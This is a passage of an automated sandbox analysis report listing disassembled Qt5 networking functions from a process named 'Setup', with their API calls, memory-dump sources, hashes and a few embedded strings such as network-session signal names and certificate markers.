                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Url@@$Array@@ByteFormatting$ComponentFlags@Option@V0@@$?lock@?password@?setDateEmpty@Encoded@Fragment@Locker@@Mode@1@@MutexMutex@@Option@2@@@@ParsingTime@@Url@@@@@V0@$$
                                                                                                                                                              • String ID: auth:
                                                                                                                                                              • API String ID: 2046563910-104923615
                                                                                                                                                              • Opcode ID: 98decf93776736cecdef3fb262640a4a88ede629d5f7772ccb30eaf0d9e09f85
                                                                                                                                                              • Instruction ID: c9f6d80d9fe466f85e43f77cb81acb4288cf36d130873d28471badb3954afdc9
                                                                                                                                                              • Opcode Fuzzy Hash: 98decf93776736cecdef3fb262640a4a88ede629d5f7772ccb30eaf0d9e09f85
                                                                                                                                                              • Instruction Fuzzy Hash: 7E711FA2B1AA13A5EB42DB71E8540FC2371FF54B58B808432CE1E57A64EF3CD55ACB40
                                                                                                                                                              Function 00007FFBA1A3D3B0 Relevance: 56.2, APIs: 30, Strings: 2, Instructions: 245COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A43750: ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA1A43864
                                                                                                                                                                • Part of subcall function 00007FFBA1A43750: ??1QMutexLocker@@QEAA@XZ.QT5CORE ref: 00007FFBA1A43880
                                                                                                                                                              • ?size@QListData@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D3F0
                                                                                                                                                              • ?indexOf@QByteArray@@QEBAHPEBDH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D407
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D41A
                                                                                                                                                              • ?at@QByteArray@@QEBADH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D429
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D438
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D474
                                                                                                                                                              • ?at@QByteArray@@QEBADH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D483
                                                                                                                                                              • ?indexOf@QByteArray@@QEBAHPEBDH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D4A3
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D4B6
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D4C3
                                                                                                                                                              • ?at@QByteArray@@QEBADH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D4D6
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D4E5
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D50A
                                                                                                                                                              • ?at@QByteArray@@QEBADH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D51D
                                                                                                                                                              • ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D531
                                                                                                                                                              • ?fromRawData@QByteArray@@SA?AV1@PEBDH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D54B
                                                                                                                                                              • ?fromBase64@QByteArray@@SA?AV1@AEBV1@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D55C
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D567
                                                                                                                                                              • ?begin@QByteArray@@QEAAPEADXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D575
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D588
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1A3D5DA
                                                                                                                                                              • ?detach_grow@QListData@@QEAAPEAUData@1@PEAHH@Z.QT5CORE ref: 00007FFBA1A3D5F4
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1A3D600
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1A3D615
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1A3D65B
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1A3D667
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA1A3D6E5
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1A3D6EE
                                                                                                                                                              • ?append@QListData@@QEAAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D71C
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D746
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@ByteData@@List$?size@String@@$?begin@$?at@$?dispose@?from?indexData@1@@$?append@?data@?detach_grow@?end@Base64@Char@@Data@Data@1@Locker@@MutexV1@@
                                                                                                                                                              • String ID: -----BEGIN CERTIFICATE-----$-----END CERTIFICATE-----
                                                                                                                                                              • API String ID: 99517125-2949388839
                                                                                                                                                              • Opcode ID: fb16e7ac215647aded21aca5fd729e355976397c186dc2539a184d6c99577b4d
                                                                                                                                                              • Instruction ID: af138a55110f2638f0ac41ee46eb2161b579995437e6b02842f47e76ba9a7d45
                                                                                                                                                              • Opcode Fuzzy Hash: fb16e7ac215647aded21aca5fd729e355976397c186dc2539a184d6c99577b4d
                                                                                                                                                              • Instruction Fuzzy Hash: AAA185A5B0E65286EBA29B35E4842B92361FF81B91F804132DD6E47755FF3CE54ACF00
                                                                                                                                                              Function 00007FFBA19ED620 Relevance: 55.9, APIs: 37, Instructions: 439timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$String$Ref@@$Char@@$Array$Data@@$?child?data@CaseChar@@@ChildEvent@Event@@@Latin1Object@@Qt@@@Sensitivity@$Flags@$?indexBasicEmpty@Int@Timer@@U1@_$?allocate@?contains@?deallocate@?mid?mid@?split@?truncate@AllocationBehaviorData@@@@@Option@Qt@@@@Ref@Ref@@@@SplitString@String@@@Vector@mallocmemcmp
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 48816679-0
                                                                                                                                                              • Opcode ID: 4c2b2cb8ef343ff253077b08d6493d95bb96729a01d0ad4b56c97a2e0adb4584
                                                                                                                                                              • Instruction ID: 79d6864a4d93160c07a7866406218c607e62c3540a11c9bd0a018e8e2c0e6c7c
                                                                                                                                                              • Opcode Fuzzy Hash: 4c2b2cb8ef343ff253077b08d6493d95bb96729a01d0ad4b56c97a2e0adb4584
                                                                                                                                                              • Instruction Fuzzy Hash: 25129EB2B0A7028AFB92DF74D4442BC33A1BB44B98B454536CE1E57695EF3CE54ACB40
                                                                                                                                                              Function 00007FFBA19A1340 Relevance: 55.7, APIs: 37, Instructions: 203timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Byte$Settings@@String@@$Variant@@$Array@@DataStream@@$String@@@$Data@@$Group@$?fromDateListTime@@$?begin?end?status@ArrayArray@@@Latin1Null@Status@1@$?begin@?can?child?contains@?data@?dispose@?end@?remove@?shared?value@Array@BasicConvert@Data@1@@Epoch@Hex@Keys@Latin1@List@@Mutex@@SecsSinceStringTimer@@Utf8@V1@@V1@_V2@@Writable@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4171179546-0
                                                                                                                                                              • Opcode ID: 5b499121672674d11233187d4b6458919e74297b9d959554a7af2a1ca2e6752c
                                                                                                                                                              • Instruction ID: 5325e955d718637c9476f540c9b46239981e5b033c361ef9189c1209e5363ac5
                                                                                                                                                              • Opcode Fuzzy Hash: 5b499121672674d11233187d4b6458919e74297b9d959554a7af2a1ca2e6752c
                                                                                                                                                              • Instruction Fuzzy Hash: 6CA14DB2B0A90285EB52DF35E8541FC2371FB50BA9B448432CE1E57668EF3CE54ACB40
                                                                                                                                                              Function 00007FFBA19DDFB0 Relevance: 54.5, APIs: 23, Strings: 8, Instructions: 215COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QObject@@QEAA@PEAV0@@Z.QT5CORE ref: 00007FFBA19DDFD1
                                                                                                                                                                • Part of subcall function 00007FFBA198C090: ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19DDFEA), ref: 00007FFBA198C0D3
                                                                                                                                                                • Part of subcall function 00007FFBA198C090: ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA198C107
                                                                                                                                                                • Part of subcall function 00007FFBA198C090: ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA198C114
                                                                                                                                                                • Part of subcall function 00007FFBA19DEBB0: ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19DDFEF), ref: 00007FFBA19DEBF3
                                                                                                                                                                • Part of subcall function 00007FFBA19DEBB0: ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA19DEC27
                                                                                                                                                                • Part of subcall function 00007FFBA19DEBB0: ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA19DEC34
                                                                                                                                                                • Part of subcall function 00007FFBA198BFC0: ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19DDFF4), ref: 00007FFBA198C003
                                                                                                                                                                • Part of subcall function 00007FFBA198BFC0: ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA198C037
                                                                                                                                                                • Part of subcall function 00007FFBA198BFC0: ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA198C044
                                                                                                                                                                • Part of subcall function 00007FFBA19E0CE0: ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA197481C), ref: 00007FFBA19E0CFB
                                                                                                                                                              • ?isEmpty@QString@@QEBA_NXZ.QT5CORE ref: 00007FFBA19DE003
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA19DE010
                                                                                                                                                                • Part of subcall function 00007FFBA19DF9E0: ?lock@QMutex@@QEAAXXZ.QT5CORE(?,?,?,?,?,?,00007FFBA19DF4D2,?,?,?,?,?,00007FFBA19733DE,?,?,00000000), ref: 00007FFBA19DFA44
                                                                                                                                                                • Part of subcall function 00007FFBA19DF9E0: ?currentThread@QThread@@SAPEAV1@XZ.QT5CORE ref: 00007FFBA19DFA73
                                                                                                                                                                • Part of subcall function 00007FFBA19DF9E0: ?mainThread@QCoreApplicationPrivate@@SAPEAVQThread@@XZ.QT5CORE ref: 00007FFBA19DFA7C
                                                                                                                                                                • Part of subcall function 00007FFBA19DF9E0: ?qAddPreRoutine@@YAXP6AXXZ@Z.QT5CORE ref: 00007FFBA19DFA8E
                                                                                                                                                                • Part of subcall function 00007FFBA19DF9E0: ?qAddPostRoutine@@YAXP6AXXZ@Z.QT5CORE ref: 00007FFBA19DFA9B
                                                                                                                                                                • Part of subcall function 00007FFBA19DF9E0: ??1QMutexLocker@@QEAA@XZ.QT5CORE ref: 00007FFBA19DFB33
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA19DE0A4
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA19DE0D2
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA19DE0DC
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA19DE0E9
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA19DE137
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA19DE2EB
                                                                                                                                                                • Part of subcall function 00007FFBA19E38E0: ?lock@QMutex@@QEAAXXZ.QT5CORE(?,?,?,00007FFBA19DE044), ref: 00007FFBA19E38F9
                                                                                                                                                                • Part of subcall function 00007FFBA19E38E0: ?unlock@QMutex@@QEAAXXZ.QT5CORE(?,?,?,00007FFBA19DE044), ref: 00007FFBA19E390F
                                                                                                                                                                • Part of subcall function 00007FFBA19DFF00: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA19DFF46
                                                                                                                                                                • Part of subcall function 00007FFBA19DFF00: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA19DFF50
                                                                                                                                                                • Part of subcall function 00007FFBA19DFF00: ??1QRecursiveMutex@@QEAA@XZ.QT5CORE ref: 00007FFBA19DFF5A
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA19DE19F
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19DE1A9
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA19DE1CA
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19DE1D4
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA19DE1F5
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19DE1FF
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA19DE220
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19DE22A
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA19DE24B
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19DE255
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA19DE276
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19DE280
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA19DE2A1
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19DE2AB
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Object@@$Connection@$Type@$Array@@Byte$?connect@ConnectionQt@@@$String@@$Data@@List$Mutex@@$?dispose@?normalized?registerData@1@@Flag@Flags@NormalizedObject@@@TypeType@@Type@@@@$?lock@Routine@@Thread@Thread@@$?begin@?current?end@?main?unlock@ApplicationCoreEmpty@Locker@@MutexPostPrivate@@RecursiveV0@@
                                                                                                                                                              • String ID: 2closed()$2error(QNetworkSession::SessionError)$2newConfigurationActivated()$2opened()$2preferredConfigurationChanged(QNetworkConfiguration,bool)$2quitPendingWaitsForOpened()$2stateChanged(QNetworkSession::State)$2usagePoliciesChanged(QNetworkSession::UsagePolicies)
                                                                                                                                                              • API String ID: 2736771781-3682561693
                                                                                                                                                              • Opcode ID: 9034e9dd034d76131aa49d37d2bb5700c10db79e03b9e39803805a24487d3ac1
                                                                                                                                                              • Instruction ID: 0ce4c6cc7637f206df8176826a74b638e9d05e0bf815475f54cceebc83717044
                                                                                                                                                              • Opcode Fuzzy Hash: 9034e9dd034d76131aa49d37d2bb5700c10db79e03b9e39803805a24487d3ac1
                                                                                                                                                              • Instruction Fuzzy Hash: 65A16BB6A0AB0686EB918F75E4902BD3360FB48B98F404536DE5E47B58EF3CD549CB00
                                                                                                                                                              Function 00007FFBA1975890 Relevance: 54.2, APIs: 36, Instructions: 236COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Url@@$ComponentFlags@FormattingOption@Url@@@@@$??8@?password@Empty@String@@0@V0@@$?userArray@@ByteName@Null@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2456552722-0
                                                                                                                                                              • Opcode ID: 0ee22ea1343d740c472d9ea4d5f5b36ab57fbd8db8839d3334eb38b49da3415a
                                                                                                                                                              • Instruction ID: 810d5a73d7dbd74f018cd54451273a06449149e6b221093f9df5203a9ee58237
                                                                                                                                                              • Opcode Fuzzy Hash: 0ee22ea1343d740c472d9ea4d5f5b36ab57fbd8db8839d3334eb38b49da3415a
                                                                                                                                                              • Instruction Fuzzy Hash: FFA185A2B1A61299FB82DB75D8542FC2361BF41BA8F844036CD1E1B6D5EF3CD54ACB10
                                                                                                                                                              Function 00007FFBA1971CE0 Relevance: 52.7, APIs: 35, Instructions: 210memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Array@@Byte$V0@@$Data@@$ArrayEmpty@$DateHashLogger@@MessageNull@Time@@$??8@?allocate?allocate@?clear@?data@?lock@?shared?warning@?willAllocationChar@@Concurrency::details::stl_critical_section_win7::stl_critical_section_win7Data@@@@@Flags@Grow@Hash@@Locker@@MutexMutex@@Node@Option@String@@0@U1@_
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 467423237-0
                                                                                                                                                              • Opcode ID: e03d315c306d1c350d4ceb407d7689921ae2fcd02ce315d992aca46ba8cc60cb
                                                                                                                                                              • Instruction ID: 20158fb38eaf01933ed4c85a6ad5b8688d6459de0937393cf00c1d6840bb718d
                                                                                                                                                              • Opcode Fuzzy Hash: e03d315c306d1c350d4ceb407d7689921ae2fcd02ce315d992aca46ba8cc60cb
                                                                                                                                                              • Instruction Fuzzy Hash: B8A13DA2B0A90296EB92DF75E8541FC2361FF50B98F804032DD1E566A5EF3CE54ACB50
                                                                                                                                                              Function 00007FFBA197EDB0 Relevance: 51.0, APIs: 27, Strings: 2, Instructions: 213COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@Byte$Data@@List$String@@$?begin@$V0@@$?dispose@Data@1@@Device@@Url@@$FileFormattingString@$?append@?clear@?detach_grow@?end@?error?error@?read@?reserve@?resize@?size@?translate@Application@@ComponentCoreData@1@Empty@Error@1@Flags@Option@Option@2@@@@
                                                                                                                                                              • String ID: QNetworkAccessFileBackend$Read error reading from %1: %2
                                                                                                                                                              • API String ID: 273609537-2818182500
                                                                                                                                                              • Opcode ID: 069985e4d407bcde0d8cc8ced109c637190525ea491311534cda21004b16bec7
                                                                                                                                                              • Instruction ID: 09acf3c3da4131ad92870c134d6eba95432a4f1deb76e9c443bedd5a421e87b2
                                                                                                                                                              • Opcode Fuzzy Hash: 069985e4d407bcde0d8cc8ced109c637190525ea491311534cda21004b16bec7
                                                                                                                                                              • Instruction Fuzzy Hash: DA9185B2F0AA0295EB82DF35D8540FC2361BF447A9B904532DE2E57694EF3CD58ACB50
                                                                                                                                                              Function 00007FFBA19A1670 Relevance: 49.7, APIs: 33, Instructions: 176memorytimeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWritable@QSettings@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A1683
                                                                                                                                                              • ?sync@QSettings@@QEAAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19A118E), ref: 00007FFBA19A192D
                                                                                                                                                                • Part of subcall function 00007FFBA19A12A0: ??0QString@@QEAA@VQLatin1String@@@Z.QT5CORE ref: 00007FFBA19A12D3
